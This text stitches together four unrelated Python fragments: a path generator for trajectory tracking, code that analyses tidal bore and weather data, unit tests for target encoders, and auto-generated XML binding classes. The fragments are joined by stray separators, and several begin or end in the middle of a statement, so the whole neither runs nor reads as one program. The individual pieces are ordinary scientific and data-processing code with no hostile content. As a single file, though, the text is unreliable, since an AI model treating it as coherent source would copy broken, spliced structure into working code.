for k, seg in enumerate(content['segments']):
segment_list = seg['segment']
if len(segment_list) > 2:
for elem in segment_list:
if [elem[0], elem[1]] not in pairs:
x += [float(elem[0])]
y += [float(elem[1])]
pairs += [[elem[0], elem[1]]]
path_list += [(Vec2d(float(elem[0]),
float(elem[1])), target_speed)]
# path_list = path_list[:-2]
# N = 5
# x_new = []
# y_new = []
# enum = 0
# while enum < len(x) - N:
# xx = x[enum:enum+N]
# yy = y[enum:enum+N]
# tck, u = splprep([np.array(xx), np.array(yy)])
# xxx = []
# for i in range(len(u) - 1):
# xxx += np.linspace(u[i], u[i+1], 4).tolist()
# new_points = splev(xxx, tck)
# x_new += [new_points[0].tolist()]
# y_new += [new_points[1].tolist()]
# enum += N
# x_new = np.array(x_new).reshape(-1, 1)
# y_new = np.array(y_new).reshape(-1, 1)
# new_path_list = []
# for i in range(x_new.shape[0]):
# new_path_list += [(Vec2d(x_new[i, 0], y_new[i, 0]), target_speed)]
return path_list, False
def figure_eight_generator(process: 'TrajectoryTrackingProcess') -> Tuple[List[Tuple[Vec2d, float]], bool]:
# TODO: Two circles that touch at intersection
# find formula on curriculum_angled_path_generator
length: float = 3000.
target_speed: float = 15.0
A: float = 500.
B: float = 500.
wavelength: float = target_speed
segment_length = wavelength / 10.
num_segments = ceil(length / | |
(from)":"wind_deg"}, inplace=True)
df.rename(columns={"wind_speed (m/s)":"wind_speed"}, inplace=True)
df['time'] = pd.to_datetime(df['time'], format="%d/%m/%Y %H:%M")
#df['time'] = pd.to_datetime(df['time'], utc=True, format="%d/%m/%Y %H:%M")
#df.set_index(['time'], inplace=True)
for index, row in df.iterrows():
df.loc[index,'time'] = np.datetime64( df.at[index,'time'] ) # numpy.datetime64 in UTC
bore = xr.Dataset()
bore = df.to_xarray()
# Set the t_dim to be a dimension and 'time' to be a coordinate
bore = bore.rename_dims( {'index':'t_dim'} ).assign_coords( time=("t_dim", bore.time.data))
bore = bore.swap_dims( {'t_dim':'time'} )
self.bore = bore
logging.info('Bore data loaded')
def get_river_data(self, HLW_list=["LW"]):
"""
Get Chester weir data. Consolidate CTR data.
Data from the table takes precident. Gaps are filled by the API.
"""
if HLW_list != ["LW"]:
print('Not expecting that possibility here')
else:
# Obtain CTR data for LW for the observations times.
self.get_Glad_data(source='ctr',HLW_list=["LW"])
alph = self.bore['Chester Weir height: CHESTER WEIR 15 MIN SG'] *np.NaN
beta = self.bore['ctr_height_LW_ctr']
#print( self.bore['ctr_height_LW_ctr'][0:10] )
self.bore['ctr_height_LW'] = alph
self.bore['ctr_height_LW'].values = [alph[i].values if np.isfinite(alph[i].values) else beta[i].values for i in range(len(alph))]
# 2015-06-20T12:16:00 has a -ve value. Only keep +ve values
self.bore['ctr_height_LW'] = self.bore['ctr_height_LW'].where( self.bore['ctr_height_LW'].values>0)
#plt.plot( ctr_h_csv, 'b+' )
#plt.plot( self.bore['ctr_height_LW_ctr'], 'ro')
#plt.plot( self.bore['ctr_height_LW'], 'g.')
del self.bore['ctr_height_LW_ctr'], self.bore['ctr_time_LW_ctr']
def get_met_data(self): #, HLW:str="HW"):
"""
Get the met data time matching the observation.
Met data from OpenWeather history download.
This can then be exported into the obs table:
c.met.to_pandas().to_csv('met.csv')
"""
fn_openweather = "data/met/openweather_2005-01-01_2021-11-08.csv"
met = OpenWeather()
met.dataset = met.read_openweather_to_xarray(fn_openweather)
winsize = 6 #4h for HW, 6h for LW. +/- search distance for nearest extreme value
self.met = xr.Dataset()
for measure_var in ['wind_speed', 'wind_deg']:
met_var = []
met_time = []
for i in range(len(self.bore.time)):
try:
met_ds = None
obs_time = self.bore.time[i].values
# Find nearest met observation
dt = np.abs(met.dataset['time'] - obs_time)
index = np.argsort(dt).values
if winsize is not None: # if search window trucation exists
if np.timedelta64(dt[index[0]].values, "m").astype("int") <= 60 * winsize: # compare in minutes
#print(f"dt:{np.timedelta64(dt[index[0]].values, 'm').astype('int')}")
#print(f"winsize:{winsize}")
met_ds = met.dataset[measure_var][index[0]]
else:
# return a NaN in an xr.Dataset
# The rather odd trailing zero is to remove the array layer
# on both time and measurement, and to match the other
# alternative for a return
met_ds = xr.DataArray( [np.NaN], coords={'time': [obs_time]})
#met_ds = xr.Dataset({measure_var: ('time', [np.NaN])}, coords={'time': [obs_time]})
else: # give the closest without window search truncation
met_ds = met.dataset[measure_var][index[0]]
#print("time,HW:",obs_time, HW.values)
if type(met_ds) is xr.DataArray:
#print(f"met: {met_ds.values}")
met_var.append( float(met_ds.values) )
#print('len(met_var)', len(met_var))
met_time.append( met_ds.time.values )
#print('len(met_time)', len(met_time))
#self.bore['LT_h'][i] = HLW.dataset.sea_level[HLW.dataset['sea_level'].argmin()]
#self.bore['LT_t'][i] = HLW.dataset.time[HLW.dataset['sea_level'].argmin()]
#ind.append(i)
#print(f"i:{i}, {met_time[-1].astype('M8[ns]').astype('M8[ms]').item()}" )
#print(met_time[-1].astype('M8[ns]').astype('M8[ms]').item().strftime('%Y-%m-%d'))
## Make timeseries plot around the highwater maxima to check
# values are being extracted as expected.
if (i % 12) == 0:
fig = plt.figure()
if measure_var == "wind_speed":
ymax = 15
if measure_var == "wind_deg":
ymax = 360
plt.subplot(3,4,(i%12)+1)
plt.plot(met.dataset.time, met.dataset[measure_var])
plt.plot( met_time[-1], met_var[-1], 'r+' )
plt.plot( [self.bore.time[i].values,self.bore.time[i].values],[0,ymax],'k')
plt.xlim([met_time[-1] - np.timedelta64(5,'h'),
met_time[-1] + np.timedelta64(5,'h')])
#plt.ylim([0,11])
plt.text( met_time[-1]-np.timedelta64(5,'h'),ymax*0.9, self.bore.location[i].values)
plt.text( met_time[-1]-np.timedelta64(5,'h'),ymax*0.1, met_time[-1].astype('M8[ns]').astype('M8[ms]').item().strftime('%Y-%m-%d'))
# Turn off tick labels
plt.gca().axes.get_xaxis().set_visible(False)
#plt.xaxis_date()
#plt.autoscale_view()
if (i%12) == 12-1:
plt.savefig('figs/check_get_'+measure_var+'_times_'+str(i//12).zfill(2)+'.png')
plt.close('all')
else:
logging.info(f"Did not find a met time near this guess {obs_time}")
print(f"Did not find a met time near this guess {obs_time}")
except:
logging.warning('Issue with appending met data')
print('Issue with appending met data')
try: # Try and print the last observation timeseries
plt.savefig('figs/check_get_'+measure_var+'_times_'+str(i//12).zfill(2)+'.png')
plt.close('all')
except:
logging.info(f"Did not have any extra panels to plot")
print(f"Did not have any extra panels to plot")
# Save a xarray objects
coords = {'time': (('time'), self.bore.time.values)}
#print("number of obs:",len(self.bore.time))
#print("length of time", len(self.bore.time.values))
#print("length of data:", len(np.array(met_var)) )
self.met[measure_var] = xr.DataArray( np.array(met_var), coords=coords, dims=['time'])
def get_Glad_data(self, source:str='harmonic', HLW_list=["HW"]):
#def get_Glad_data(self, source:str='harmonic', HLW:str="HW"):
"""
Get Gladstone HLW data from external source
These data are reported in the bore.csv file but not consistently and it
is laborous to find old values.
It was considered a good idea to automate this step.
inputs:
source: 'harmonic' [default] - load HLW from harmonic prediction
'harmonic_rec' - reconstruct time series from harmonic constants
'bodc' - measured and processed data
'api' - load recent, un processed data from shoothill API
HLW_list: ["LW","HW","FW","EW"] - the data is either processed for High or Low water
events, or Flood or Ebb (inflection) events
"""
loc = "liv" # default location - Liverpool
logging.info("Get Gladstone HLW data")
if source == "harmonic": # Load tidetable data from files
filnam1 = '/Users/jeff/GitHub/DeeBore/data/Liverpool_2005_2014_HLW.txt'
filnam2 = '/Users/jeff/GitHub/DeeBore/data/Liverpool_2015_2020_HLW.txt'
filnam3 = '/Users/jeff/GitHub/DeeBore/data/Liverpool_2021_2022_HLW.txt'
tg = GAUGE()
tg1 = GAUGE()
tg2 = GAUGE()
tg3 = GAUGE()
tg1.dataset = tg1.read_hlw_to_xarray(filnam1)#, self.bore.time.min().values, self.bore.time.max().values)
tg2.dataset = tg2.read_hlw_to_xarray(filnam2)#, self.bore.time.min().values, self.bore.time.max().values)
tg3.dataset = tg3.read_hlw_to_xarray(filnam3)#, self.bore.time.min().values, self.bore.time.max().values)
tg.dataset = xr.concat([ tg1.dataset, tg2.dataset, tg3.dataset], dim='time')
# This produces an xr.dataset with sea_level_highs and sea_level_lows
# with time variables time_highs and time_lows.
tg_HLW = tg.find_high_and_low_water(var_str='sea_level')
elif source == "bodc": # load full 15min data from BODC files, extract HLW
dir = '/Users/jeff/GitHub/DeeBore/data/BODC_processed/'
filelist = ['2005LIV.txt',
'2006LIV.txt', '2007LIV.txt',
'2008LIV.txt', '2009LIV.txt',
'2010LIV.txt', '2011LIV.txt',
'2012LIV.txt', '2013LIV.txt',
'2014LIV.txt', '2015LIV.txt',
'2016LIV.txt', '2017LIV.txt',
'2018LIV.txt', '2019LIV.txt',
'2020LIV.txt',
'LIV2101.txt', 'LIV2102.txt',
'LIV2103.txt', 'LIV2104.txt',
'LIV2105.txt', 'LIV2106.txt',
'LIV2107.txt', 'LIV2108.txt',
'LIV2109.txt', 'LIV2110.txt']
tg = GAUGE()
for file in filelist:
tg0=GAUGE()
tg0.dataset = tg0.read_bodc_to_xarray(dir+file)
if tg.dataset is None:
tg.dataset = tg0.dataset
else:
tg.dataset = xr.concat([ tg.dataset, tg0.dataset], dim='time')
# Use QC to drop null values
#tg.dataset['sea_level'] = tg.dataset.sea_level.where( np.logical_or(tg.dataset.qc_flags=='', tg.dataset.qc_flags=='T'), drop=True)
tg.dataset['sea_level'] = tg.dataset.sea_level.where( tg.dataset.qc_flags!='N', drop=True)
# Fix some attributes (others might not be correct for all data)
tg.dataset['start_date'] = tg.dataset.time.min().values
tg.dataset['end_date'] = tg.dataset.time.max().values
# This produces an xr.dataset with sea_level_highs and sea_level_lows
# with time variables time_highs and time_lows.
#tg_HLW = tg.find_high_and_low_water(var_str='sea_level',method='cubic') #'cubic')
elif source == "api": # load full tidal signal from shoothill, extract HLW
date_start=np.datetime64('2005-04-01')
date_end=np.datetime64('now','D')
fn_archive = "liv" # File head for netcdf archive of api call
# Load timeseries from local file if it exists
try:
tg1 = GAUGE()
tg2 = GAUGE()
tg = GAUGE()
# Load local file. Created with archive_shoothill.py
dir = "archive_shoothill/"
tg1.dataset = xr.open_mfdataset(dir + fn_archive + "_????.nc") # Tidal port Gladstone Dock, Liverpool
tg1.dataset = tg1.dataset.sel(time=slice(date_start, date_end))
print(f"{len(tg1.dataset.time)} pts loaded from netcdf")
if (tg1.dataset.time[-1].values < date_end):
tg2 = GAUGE()
tg2.dataset = tg2.read_shoothill_to_xarray(date_start=tg1.dataset.time[-1].values, date_end=date_end)
tg.dataset = xr.concat([ tg1.dataset, tg2.dataset], dim='time')
print(f"{len(tg2.dataset.time)} pts loaded from API")
else:
tg = tg1
except:
tg.dataset = tg.read_shoothill_to_xarray(date_start=date_start, date_end=date_end)
# This produces an xr.dataset with sea_level_highs and sea_level_lows
# with time variables time_highs and time_lows.
#tg_HLW = tg.find_high_and_low_water(var_str='sea_level',method='cubic') #'cubic')
elif source == "ctr": # use api to load chester weir. Reset loc variable
loc = "ctr"
tg = GAUGE()
date_start=np.datetime64('2014-01-01')
date_end=np.datetime64('now','D')
#station_id = 7900 # below weir
station_id = 7899 # above weir
fn_archive = "ctr" # File head for netcdf archive of api call
station_id = 968
fn_archive = "iron"
# Load timeseries from local file if it exists
try:
tg1 = GAUGE()
tg2 = GAUGE()
tg = GAUGE()
# Load local file. Created with archive_shoothill.py
dir = "archive_shoothill/"
tg1.dataset = xr.open_mfdataset(dir + fn_archive + "_????.nc") # Tidal port Gladstone Dock, Liverpool
tg1.dataset = tg1.dataset.sel(time=slice(date_start, date_end))
print(f"{len(tg1.dataset.time)} pts loaded from netcdf")
if (tg1.dataset.time[-1].values < date_end):
tg2 = GAUGE()
tg2.dataset = tg2.read_shoothill_to_xarray(station_id=station_id, date_start=tg1.dataset.time[-1].values, date_end=date_end)
tg.dataset = xr.concat([ tg1.dataset, tg2.dataset], dim='time')
print(f"{len(tg2.dataset.time)} pts loaded from API")
else:
tg = tg1
except:
tg.dataset = tg.read_shoothill_to_xarray(station_id=station_id ,date_start=date_start, date_end=date_end)
# This produces an xr.dataset with sea_level_highs and sea_level_lows
# with time variables time_highs and time_lows.
tg_HLW = tg.find_high_and_low_water(var_str='sea_level')
elif source == 'harmonic_rec': # load full tidal signal using anyTide code, extract HLW
tg = GAUGE()
#date_start=np.datetime64('now')
#ndays = 5
#tg.dataset = tg.anyTide_to_xarray(date_start=date_start, ndays=5)
date_start=np.datetime64('2005-04-01')
date_end=np.datetime64('now','D')
tg.dataset = tg.anyTide_to_xarray(date_start=date_start, date_end=date_end)
# This produces an xr.dataset with sea_level_highs and sea_level_lows
# with time variables time_highs and time_lows.
tg_HLW = tg.find_high_and_low_water(var_str='sea_level')
else:
logging.debug(f"Did not expect this eventuality...")
self.tg = tg
## Process the *_highs or *_lows
for HLW in HLW_list:
print(f"HLW: {HLW}")
#time_var = 'time_highs'
#measure_var = 'sea_level_highs'
#ind = [] # list of indices in the obs bore data where gladstone data is found
if HLW == 'HW':
time_var = 'time_highs'
measure_var = 'sea_level_highs'
elif HLW == 'LW':
time_var = 'time_lows'
measure_var = 'sea_level_lows'
elif HLW == 'FW':
time_var = 'time_flood'
measure_var = 'sea_level_flood'
elif HLW == 'EW':
time_var = 'time_ebb'
measure_var = 'sea_level_ebb'
else:
print('This should | |
= te.fit_transform(df[['a', 'b', 'c']], df['y'])
assert 'a' in dfo
assert 'b' in dfo
assert 'c' in dfo
assert 'y' not in dfo
assert dfo.shape[0] == 10
assert dfo.shape[1] == 3
assert dfo.loc[0, 'b'] == 1
assert dfo.loc[1, 'b'] == 1
assert dfo.loc[2, 'b'] == 5
assert dfo.loc[3, 'b'] == 5
assert dfo.loc[4, 'b'] == 9
assert dfo.loc[5, 'b'] == 9
assert dfo.loc[6, 'b'] == 20
assert dfo.loc[7, 'b'] == 20
assert dfo.loc[8, 'b'] == 20
assert np.isnan(dfo.loc[9, 'b'])
assert dfo.loc[0, 'c'] == 2
assert dfo.loc[1, 'c'] == 2
assert dfo.loc[2, 'c'] == 2
assert dfo.loc[3, 'c'] == 8
assert dfo.loc[4, 'c'] == 8
assert dfo.loc[5, 'c'] == 8
assert np.isnan(dfo.loc[6, 'c'])
assert np.isnan(dfo.loc[7, 'c'])
assert np.isnan(dfo.loc[8, 'c'])
assert dfo.loc[9, 'c'] == 1000
# Should auto-detect categorical columns if cols is not specified
df['b'] = ['a', 'a', 'b', 'b', 'c', 'c', 'd', 'd', 'd', np.nan]
df['c'] = ['a', 'a', 'a', 'b', 'b', 'b', np.nan, np.nan, np.nan, 'c']
te = TargetEncoder()
dfo = te.fit_transform(df[['a', 'b', 'c']], df['y'])
assert 'a' in dfo
assert 'b' in dfo
assert 'c' in dfo
assert 'y' not in dfo
assert dfo.shape[0] == 10
assert dfo.shape[1] == 3
assert dfo.loc[0, 'b'] == 1
assert dfo.loc[1, 'b'] == 1
assert dfo.loc[2, 'b'] == 5
assert dfo.loc[3, 'b'] == 5
assert dfo.loc[4, 'b'] == 9
assert dfo.loc[5, 'b'] == 9
assert dfo.loc[6, 'b'] == 20
assert dfo.loc[7, 'b'] == 20
assert dfo.loc[8, 'b'] == 20
assert np.isnan(dfo.loc[9, 'b'])
assert dfo.loc[0, 'c'] == 2
assert dfo.loc[1, 'c'] == 2
assert dfo.loc[2, 'c'] == 2
assert dfo.loc[3, 'c'] == 8
assert dfo.loc[4, 'c'] == 8
assert dfo.loc[5, 'c'] == 8
assert np.isnan(dfo.loc[6, 'c'])
assert np.isnan(dfo.loc[7, 'c'])
assert np.isnan(dfo.loc[8, 'c'])
assert dfo.loc[9, 'c'] == 1000
def test_TargetEncoderCV():
"""Tests encoding.TargetEncoderCV"""
# Data
df = pd.DataFrame()
df['a'] = np.random.randn(10)
df['b'] = ['a', 'a', 'b', 'b', np.nan, 'a', 'a', 'b', 'b', 'c']
df['y'] = [0, 2, 8, 10, -1000, 4, 6, 12, 14, 1000]
# Encode
te = TargetEncoderCV(cols='b', n_splits=2, shuffle=False)
dfo = te.fit_transform(df[['a', 'b']], df['y'])
# Check outputs
assert 'a' in dfo
assert 'b' in dfo
assert 'y' not in dfo
assert dfo.shape[0] == 10
assert dfo.shape[1] == 2
assert dfo.loc[0, 'b'] == 5
assert dfo.loc[1, 'b'] == 5
assert dfo.loc[2, 'b'] == 13
assert dfo.loc[3, 'b'] == 13
assert np.isnan(dfo.loc[4, 'b']) #nans should propagate
assert dfo.loc[5, 'b'] == 1
assert dfo.loc[6, 'b'] == 1
assert dfo.loc[7, 'b'] == 9
assert dfo.loc[8, 'b'] == 9
assert np.isnan(dfo.loc[9, 'b']) #cat only in test fold should be nan!
# Ensure setting n_splits works
df = pd.DataFrame()
df['a'] = np.random.randn(9)
df['b'] = ['a', 'a', 'b', 'b', 'b', 'a', 'a', 'a', 'b']
df['y'] = [0, 1, 11,
12, 13, 2,
3, 4, 14]
te = TargetEncoderCV(cols='b', n_splits=3, shuffle=False)
dfo = te.fit_transform(df[['a', 'b']], df['y'])
assert 'a' in dfo
assert 'b' in dfo
assert 'y' not in dfo
assert dfo.shape[0] == 9
assert dfo.shape[1] == 2
assert dfo.loc[0, 'b'] == 3
assert dfo.loc[1, 'b'] == 3
assert dfo.loc[2, 'b'] == 13
assert dfo.loc[3, 'b'] == 12.5
assert dfo.loc[4, 'b'] == 12.5
assert dfo.loc[5, 'b'] == 2
assert dfo.loc[6, 'b'] == 1
assert dfo.loc[7, 'b'] == 1
assert dfo.loc[8, 'b'] == 12
# Check shuffle works
df = pd.DataFrame()
df['a'] = np.random.randn(100)
df['b'] = 50*['aa', 'bb']
df['y'] = np.zeros(100)
df.loc[df['b']=='aa', 'y'] = np.random.randn(50)
df.loc[df['b']=='bb', 'y'] = 1000+np.random.randn(50)
te = TargetEncoderCV(cols='b', n_splits=3, shuffle=True)
dfo = te.fit_transform(df[['a', 'b']], df['y'])
assert dfo['b'].nunique() == 6
aa_vals = dfo.loc[df['b']=='aa', 'b']
bb_vals = dfo.loc[df['b']=='bb', 'b']
assert aa_vals.nunique() == 3
assert bb_vals.nunique() == 3
assert not (aa_vals.unique() == aa_vals.mean()).any()
assert not (bb_vals.unique() == bb_vals.mean()).any()
assert (abs(aa_vals.unique())<1.0).all()
assert (abs(bb_vals.unique()-1000)<1.0).all()
# Check multiple cols works
df = pd.DataFrame()
df['a'] = np.random.randn(8)
df['b'] = ['a', 'a', 'b', 'b',
'a', 'a', 'b', 'b']
df['c'] = ['a', 'b', 'a', 'b',
'a', 'b', 'a', 'b']
df['y'] = [0, 1, 10, 11,
2, 3, 12, 13]
te = TargetEncoderCV(cols=['b', 'c'], n_splits=2, shuffle=False)
dfo = te.fit_transform(df[['a', 'b', 'c']], df['y'])
assert 'a' in dfo
assert 'b' in dfo
assert 'c' in dfo
assert 'y' not in dfo
assert dfo.shape[0] == 8
assert dfo.shape[1] == 3
# b column
assert dfo.loc[0, 'b'] == 2.5
assert dfo.loc[1, 'b'] == 2.5
assert dfo.loc[2, 'b'] == 12.5
assert dfo.loc[3, 'b'] == 12.5
assert dfo.loc[4, 'b'] == 0.5
assert dfo.loc[5, 'b'] == 0.5
assert dfo.loc[6, 'b'] == 10.5
assert dfo.loc[7, 'b'] == 10.5
# c column
assert dfo.loc[0, 'c'] == 7
assert dfo.loc[1, 'c'] == 8
assert dfo.loc[2, 'c'] == 7
assert dfo.loc[3, 'c'] == 8
assert dfo.loc[4, 'c'] == 5
assert dfo.loc[5, 'c'] == 6
assert dfo.loc[6, 'c'] == 5
assert dfo.loc[7, 'c'] == 6
# Should auto-detect categorical cols if cols was not specified
df = pd.DataFrame()
df['a'] = np.random.randn(8)
df['b'] = ['a', 'a', 'b', 'b',
'a', 'a', 'b', 'b']
df['c'] = ['a', 'b', 'a', 'b',
'a', 'b', 'a', 'b']
df['y'] = [0, 1, 10, 11,
2, 3, 12, 13]
te = TargetEncoderCV(n_splits=2, shuffle=False)
dfo = te.fit_transform(df[['a', 'b', 'c']], df['y'])
assert 'a' in dfo
assert 'b' in dfo
assert 'c' in dfo
assert 'y' not in dfo
assert dfo.shape[0] == 8
assert dfo.shape[1] == 3
# b column
assert dfo.loc[0, 'b'] == 2.5
assert dfo.loc[1, 'b'] == 2.5
assert dfo.loc[2, 'b'] == 12.5
assert dfo.loc[3, 'b'] == 12.5
assert dfo.loc[4, 'b'] == 0.5
assert dfo.loc[5, 'b'] == 0.5
assert dfo.loc[6, 'b'] == 10.5
assert dfo.loc[7, 'b'] == 10.5
# c column
assert dfo.loc[0, 'c'] == 7
assert dfo.loc[1, 'c'] == 8
assert dfo.loc[2, 'c'] == 7
assert dfo.loc[3, 'c'] == 8
assert dfo.loc[4, 'c'] == 5
assert dfo.loc[5, 'c'] == 6
assert dfo.loc[6, 'c'] == 5
assert dfo.loc[7, 'c'] == 6
def test_target_encode():
"""Tests encoding.target_encode"""
# Data
df = pd.DataFrame()
df['a'] = np.random.randn(10)
df['b'] = ['a', 'a', 'b', 'b', 'c', 'c', 'd', 'd', 'd', np.nan]
df['y'] = [0, 2, 4, 6, 8, 10, 19, 20, 21, 1000]
# Encode
dfo = target_encode(df[['a', 'b']], df['y'], cols='b')
# Check outputs
assert 'a' in dfo
assert 'b' in dfo
assert 'y' not in dfo
assert dfo.shape[0] == 10
assert dfo.shape[1] == 2
assert dfo.loc[0, 'b'] == 1
assert dfo.loc[1, 'b'] == 1
assert dfo.loc[2, 'b'] == 5
assert dfo.loc[3, 'b'] == 5
assert dfo.loc[4, 'b'] == 9
assert dfo.loc[5, 'b'] == 9
assert dfo.loc[6, 'b'] == 20
assert dfo.loc[7, 'b'] == 20
assert dfo.loc[8, 'b'] == 20
assert np.isnan(dfo.loc[9, 'b'])
def test_target_encode_cv():
"""Tests encoding.target_encode_cv"""
# Data
df = pd.DataFrame()
df['a'] = np.random.randn(10)
df['b'] = ['a', 'a', 'b', 'b', 'c', 'c', 'd', 'd', 'd', np.nan]
df['y'] = [0, 2, 4, 6, 8, 10, 19, 20, 21, 1000]
# Encode
dfo = target_encode_cv(df[['a', 'b']], df['y'], cols='b')
# Check outputs
assert 'a' in dfo
assert 'b' in dfo
assert 'y' not in dfo
assert dfo.shape[0] == 10
assert dfo.shape[1] == 2
def test_target_encode_loo():
"""Tests encoding.target_encode_loo"""
# Data
df = pd.DataFrame()
df['a'] = np.random.randn(10)
df['b'] = ['a', 'a', 'b', 'b', 'c', 'c', 'd', 'd', 'd', np.nan]
df['y'] = [0, 2, 4, 6, 8, 10, 19, 20, 21, 15]
# Encode
dfo = target_encode_loo(df[['a', 'b']], df['y'], cols='b')
# Check outputs
assert 'a' in dfo
assert 'b' in dfo
assert 'y' not in dfo
assert dfo.shape[0] == 10
assert dfo.shape[1] == 2
assert dfo.loc[0, 'b'] == 2
assert dfo.loc[1, 'b'] == 0
assert dfo.loc[2, 'b'] == 6
assert dfo.loc[3, 'b'] == 4
assert dfo.loc[4, 'b'] == 10
assert dfo.loc[5, 'b'] == 8
assert dfo.loc[6, 'b'] == 20.5
assert dfo.loc[7, 'b'] == 20.0
assert dfo.loc[8, 'b'] == 19.5
assert np.isnan(dfo.loc[9, 'b'])
# Encode w/ bayesian_c
dfo = target_encode_loo(df[['a', 'b']], df['y'], cols='b', bayesian_c=10)
# Check outputs
assert 'a' in dfo
assert 'b' in dfo
assert 'y' not in dfo
assert dfo.shape[0] == 10
assert dfo.shape[1] == 2
# The mean (10.5) should bring a, b, c up, but d down
assert dfo.loc[0, 'b'] > 2
assert dfo.loc[1, 'b'] > | |
MixedContainer.TypeString:
outfile.write('<%s>%s</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeInteger or \
self.content_type == MixedContainer.TypeBoolean:
outfile.write('<%s>%d</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeFloat or \
self.content_type == MixedContainer.TypeDecimal:
outfile.write('<%s>%f</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeDouble:
outfile.write('<%s>%g</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeBase64:
outfile.write('<%s>%s</%s>' % (
self.name,
base64.b64encode(self.value),
self.name))
def to_etree(self, element):
if self.category == MixedContainer.CategoryText:
# Prevent exporting empty content as empty lines.
if self.value.strip():
if len(element) > 0:
if element[-1].tail is None:
element[-1].tail = self.value
else:
element[-1].tail += self.value
else:
if element.text is None:
element.text = self.value
else:
element.text += self.value
elif self.category == MixedContainer.CategorySimple:
subelement = etree_.SubElement(
element, '%s' % self.name)
subelement.text = self.to_etree_simple()
else: # category == MixedContainer.CategoryComplex
self.value.to_etree(element)
def to_etree_simple(self):
if self.content_type == MixedContainer.TypeString:
text = self.value
elif (self.content_type == MixedContainer.TypeInteger or
self.content_type == MixedContainer.TypeBoolean):
text = '%d' % self.value
elif (self.content_type == MixedContainer.TypeFloat or
self.content_type == MixedContainer.TypeDecimal):
text = '%f' % self.value
elif self.content_type == MixedContainer.TypeDouble:
text = '%g' % self.value
elif self.content_type == MixedContainer.TypeBase64:
text = '%s' % base64.b64encode(self.value)
return text
def exportLiteral(self, outfile, level, name):
if self.category == MixedContainer.CategoryText:
showIndent(outfile, level)
outfile.write(
'model_.MixedContainer(%d, %d, "%s", "%s"),\n' % (
self.category, self.content_type,
self.name, self.value))
elif self.category == MixedContainer.CategorySimple:
showIndent(outfile, level)
outfile.write(
'model_.MixedContainer(%d, %d, "%s", "%s"),\n' % (
self.category, self.content_type,
self.name, self.value))
else: # category == MixedContainer.CategoryComplex
showIndent(outfile, level)
outfile.write(
'model_.MixedContainer(%d, %d, "%s",\n' % (
self.category, self.content_type, self.name,))
self.value.exportLiteral(outfile, level + 1)
showIndent(outfile, level)
outfile.write(')\n')
class MemberSpec_(object):
def __init__(self, name='', data_type='', container=0,
optional=0, child_attrs=None, choice=None):
self.name = name
self.data_type = data_type
self.container = container
self.child_attrs = child_attrs
self.choice = choice
self.optional = optional
def set_name(self, name): self.name = name
def get_name(self): return self.name
def set_data_type(self, data_type): self.data_type = data_type
def get_data_type_chain(self): return self.data_type
def get_data_type(self):
if isinstance(self.data_type, list):
if len(self.data_type) > 0:
return self.data_type[-1]
else:
return 'xs:string'
else:
return self.data_type
def set_container(self, container): self.container = container
def get_container(self): return self.container
def set_child_attrs(self, child_attrs): self.child_attrs = child_attrs
def get_child_attrs(self): return self.child_attrs
def set_choice(self, choice): self.choice = choice
def get_choice(self): return self.choice
def set_optional(self, optional): self.optional = optional
def get_optional(self): return self.optional
def _cast(typ, value):
if typ is None or value is None:
return value
return typ(value)
#
# Data representation classes.
#
class DocumentStatus(Enum):
"""DocumentStatus - enum"""
PENDING='Pending' # Pending
QUEUED='Queued' # Queued
PROCESSING='Processing' # Processing
COMPLETED='Completed' # Completed
ERROR='Error' # Error
class Language(Enum):
"""Language - enum"""
EN='en' # en
FR='fr' # fr
class Request(GeneratedsSuper):
__hash__ = GeneratedsSuper.__hash__
subclass = None
superclass = None
def __init__(self, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = None
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, Request)
if subclass is not None:
return subclass(*args_, **kwargs_)
if Request.subclass:
return Request.subclass(*args_, **kwargs_)
else:
return Request(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def hasContent_(self):
if (
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='', name_='Request', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('Request')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'Request':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='Request')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='Request', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='Request'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='', name_='Request', fromsubclass_=False, pretty_print=True):
pass
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
pass
# end class Request
class ArrayOfDocumentCriteria(GeneratedsSuper):
__hash__ = GeneratedsSuper.__hash__
subclass = None
superclass = None
def __init__(self, DocumentCriteria=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = None
if DocumentCriteria is None:
self.DocumentCriteria = []
else:
